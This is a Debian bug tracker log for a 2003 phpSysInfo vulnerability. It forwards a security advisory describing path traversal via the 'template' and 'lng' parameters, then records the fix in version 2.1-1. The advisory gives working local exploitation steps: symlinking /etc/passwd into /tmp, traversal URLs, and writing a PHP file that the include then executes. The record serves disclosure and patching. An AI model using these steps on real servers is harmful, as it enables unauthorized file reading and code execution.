Debian Bug report logs - #200543
[ripe@7a69ezine.org: Unauthorized reading files on phpSysInfo]

version graph

Package: phpsysinfo; Maintainer for phpsysinfo is Bjoern Boschman <bjoern@boschman.de>; Source for phpsysinfo is src:phpsysinfo.

Reported by: Matt Zimmerman <mdz@debian.org>

Date: Wed, 9 Jul 2003 01:03:01 UTC

Severity: grave

Tags: security

Fixed in version phpsysinfo/2.1-1

Done: Frederik Schueler <fschueler@gmx.net>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>:
Bug#200543; Package phpsysinfo. Full text and rfc822 format available.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
New Bug report received and forwarded. Copy sent to Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Matt Zimmerman <mdz@debian.org>
To: submit@bugs.debian.org
Subject: [ripe@7a69ezine.org: Unauthorized reading files on phpSysInfo]
Date: Tue, 8 Jul 2003 20:48:53 -0400
Package: phpsysinfo
Severity: grave
Tags: security

----- Forwarded message from Albert Puigsech Galicia <ripe@7a69ezine.org> -----

Date: Fri, 25 Apr 2003 08:22:23 +0100
From: Albert Puigsech Galicia <ripe@7a69ezine.org>
To: bugtraq@securityfocus.com
Subject: Unauthorized reading files on phpSysInfo

/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 007
|-----------------------------------------------------------------------------|
|
|              [ Unauthorized reading files on phpSysInfo ]
|
\-----------------------------------------------------------------------------/
                                                                | 01/04/2003 |


Data.
-----

        + Type:         To gain visiblity.

        + Software:     phpSysInfo.

        + Verions:      until 2.1 (current version).

        + Exploit:      Yes (but only local).

        + Autor:        Albert Puigsech Galicia

        + Contact:      ripe@7a69ezine.org



Information.
------------

        PhpSysInfo is a litle PHP script destined to show system information.
It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE
information, etc. Visit project website on  http://phpsysinfo.sourceforge.net
for more info.


Description.
------------

        PhpSysInfo uses a template system using 'template' variable, and a
languaje system using 'lng' variable. These variables are used to complete
a file path without check if it contains the '..' especial directory, allowing
to read any file on system as webserver user.


Exploiting.
-----------

        The exploit of this vulnerability require write access on a local
directory where webserver can read files.

        On template case, phpSysInfo cheks only if template exists. To do
it only check if 'templates/$template' exists.


---/ index.php /---

if (!((isset($template) && file_exists("templates/$template")) || $template ==
'xml')) {
    // default template we should use if we don't get a argument.
    $template = 'classic';
}

---/ index.php /---


        Exactly the same on languaje selection system.


---/ index.php /---

if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    $lng = 'en';
    // see if the browser knows the right languange.
    if(isset($HTTP_ACCEPT_LANGUAGE)) {
        $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
        if(count($plng) > 0) {
            while(list($k,$v) = each($plng)) {
                $k = split(';', $v, 1);
                $k = split('-', $k[0]);
                if(file_exists('./includes/lang/' . $k[0] . '.php')) {
                    $lng = $k[0];
                    break;
                }
            }
        }
    }
}

---/ index.php /---

        'template, variable will be used to use the file
'./templates/$template/form.tpl' and './templates/$template/box.tpl'
for template stuff, so is necesary ti create the symlinks to read
any file allowed to webserver.


        local ~$ ln -s /etc/passwd /tmp/form.tpl
        local ~$ ln -s /etc/passwd /tmp/box.tpl

        http://vulnerable/index.php?template=../../../../tmp


        'lng' variable is used on this peace of code:

---/ index.php /---

require('./includes/lang/' . $lng . '.php');   // get our language include

---/ index.php /---


        It allow us, as the same way as 'template' to read a file on
the system.


        local ~$ ln -s /etc/passwd /tmp/p.php

        http://vulnerable/index.php?lng=../../../../tmp/p


        But it also allow to execute arbitrary PHP code, creating the php
file firts.


        local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php

        http://vulnerable/index.php?lng=../../../../tmp/p


        The use of '.' php function to concat strings remote exploit for
this vulnerable php script, because we cant use %00 to end the string.


Patch.
------

        There is not an oficial patch, but is easy to code it adding some
regex on the code to filter '..' content on 'template' and 'lng' variables.



--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================

----- End forwarded message -----

-- 
 - mdz



Information forwarded to debian-bugs-dist@lists.debian.org, Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>:
Bug#200543; Package phpsysinfo. Full text and rfc822 format available.

Acknowledgement sent to Martin Michlmayr <tbm@cyrius.com>:
Extra info received and forwarded to list. Copy sent to Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>. Full text and rfc822 format available.

Message #10 received at 200543@bugs.debian.org (full text, mbox):

From: Martin Michlmayr <tbm@cyrius.com>
To: 200543@bugs.debian.org
Subject: Fixed in stable, not in testing/unstable
Date: Sun, 12 Oct 2003 23:48:06 +1000
This has been fixed in stable due to DSA-346-1
(http://www.debian.org/security/2003/dsa-346), but testing/unstable
are still vulnerable.

-- 
Martin Michlmayr
tbm@cyrius.com



Reply sent to Frederik Schueler <fschueler@gmx.net>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Matt Zimmerman <mdz@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #15 received at 200543-close@bugs.debian.org (full text, mbox):

From: Frederik Schueler <fschueler@gmx.net>
To: 200543-close@bugs.debian.org
Subject: Bug#200543: fixed in phpsysinfo 2.1-1
Date: Mon, 13 Oct 2003 07:47:34 -0400
Source: phpsysinfo
Source-Version: 2.1-1

We believe that the bug you reported is fixed in the latest version of
phpsysinfo, which is due to be installed in the Debian FTP archive:

phpsysinfo_2.1-1.diff.gz
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1.diff.gz
phpsysinfo_2.1-1.dsc
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1.dsc
phpsysinfo_2.1-1_all.deb
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1_all.deb
phpsysinfo_2.1.orig.tar.gz
  to pool/main/p/phpsysinfo/phpsysinfo_2.1.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 200543@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Frederik Schueler <fschueler@gmx.net> (supplier of updated phpsysinfo package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sat, 27 Sep 2003 21:30:33 +0200
Source: phpsysinfo
Binary: phpsysinfo
Architecture: source all
Version: 2.1-1
Distribution: unstable
Urgency: low
Maintainer: Frederik Schueler <fschueler@gmx.net>
Changed-By: Frederik Schueler <fschueler@gmx.net>
Description: 
 phpsysinfo - PHP Based Host Information
Closes: 134896 163788 200543 211701
Changes: 
 phpsysinfo (2.1-1) unstable; urgency=low
 .
   * News maintainer, closes:  #211701
   * New upstream release
   * fixed template/lng parsing, closes: #200543
   * added alternative php4-cgi and php3-cgi ependency, closes: #163788
   * fixed package description, closes: #134896
   * bumped standards to 3.6.1
   * added patch for Linux 2.5/2.6 /proc/meninfo handling
Files: 
 a8039368ee52fd8912a0a35a316d1ac9 577 web optional phpsysinfo_2.1-1.dsc
 22d4d7977dfff237f8e0aa3e4ebaee75 104141 web optional phpsysinfo_2.1.orig.tar.gz
 966612f8eaa0675afcfcbf8e048f2bef 3601 web optional phpsysinfo_2.1-1.diff.gz
 83a709965f025b94e151453e1b0cd7a0 92612 web optional phpsysinfo_2.1-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/io/GlJsl7AdEclIRAlpXAJsHqx5WTF3869U575i0PSXbF0KR0wCfYnvy
LgdQBnQURFEV261kup+m9gA=
=1PVh
-----END PGP SIGNATURE-----




Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 11:19:37 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.